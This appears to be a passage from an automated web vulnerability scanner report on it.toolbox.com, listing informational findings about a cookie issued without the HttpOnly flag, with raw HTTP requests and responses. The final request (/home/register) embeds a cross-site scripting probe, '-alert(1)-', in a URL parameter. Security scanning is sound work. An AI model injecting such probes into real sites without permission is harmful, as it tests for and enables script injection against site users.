Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Dx3: Data D
...[SNIP]...

6.11. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/elementary-school-and-saas-38160

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/elementary-school-and-saas-38160 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70278
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Elementary
...[SNIP]...

6.12. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/it-starts-with-data-40018

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/it-starts-with-data-40018 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72957
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   It Starts W
...[SNIP]...

6.13. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/key-success-factorswho-needs-em-42168

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72699
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Key Success
...[SNIP]...

6.14. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/life-cycles-40815

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/life-cycles-40815 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68279
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Life Cycles
...[SNIP]...

6.15. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/making-the-case-43129

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/making-the-case-43129 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73965
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Making The
...[SNIP]...

6.16. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/micracle-free-37832

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/micracle-free-37832 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66943
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Micracle Fr
...[SNIP]...

6.17. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/plowing-sideways-43376

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/plowing-sideways-43376 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67827
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Plowing Sid
...[SNIP]...

6.18. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/roadmap-process-38207

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/roadmap-process-38207 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73552
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Roadmap Pro
...[SNIP]...

6.19. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/saas-marches-on-38509

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/saas-marches-on-38509 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66827
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SaaS marche
...[SNIP]...

6.20. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/talent-curves-40195

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/talent-curves-40195 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85703
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Talent Curv
...[SNIP]...

6.21. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/technical-debt-revisiited-38720

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/technical-debt-revisiited-38720 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75502
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Technical D
...[SNIP]...

6.22. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69302
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Check B
...[SNIP]...

6.23. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-emergent-comedy-39924

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/the-emergent-comedy-39924 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68773
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Emergen
...[SNIP]...

6.24. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-wocket-in-your-pocket-42008

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69404
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Wocket
...[SNIP]...

6.25. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/two-old-pals-41071

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/two-old-pals-41071 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68626
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Two Old Pal
...[SNIP]...

6.26. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/venture-and-gender-43847

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/venture-and-gender-43847 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66046
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Venture and
...[SNIP]...

6.27. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/why-should-i-change-40067

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/why-should-i-change-40067 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Why Should
...[SNIP]...

6.28. http://it.toolbox.com/home/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/register

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/register?trksubprod=joinnow_stationary&opi_t=Future+States&opi_u=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%3f306f2'-alert(1)-'2382eb5920b%3d1&opi_o=5 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39817
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
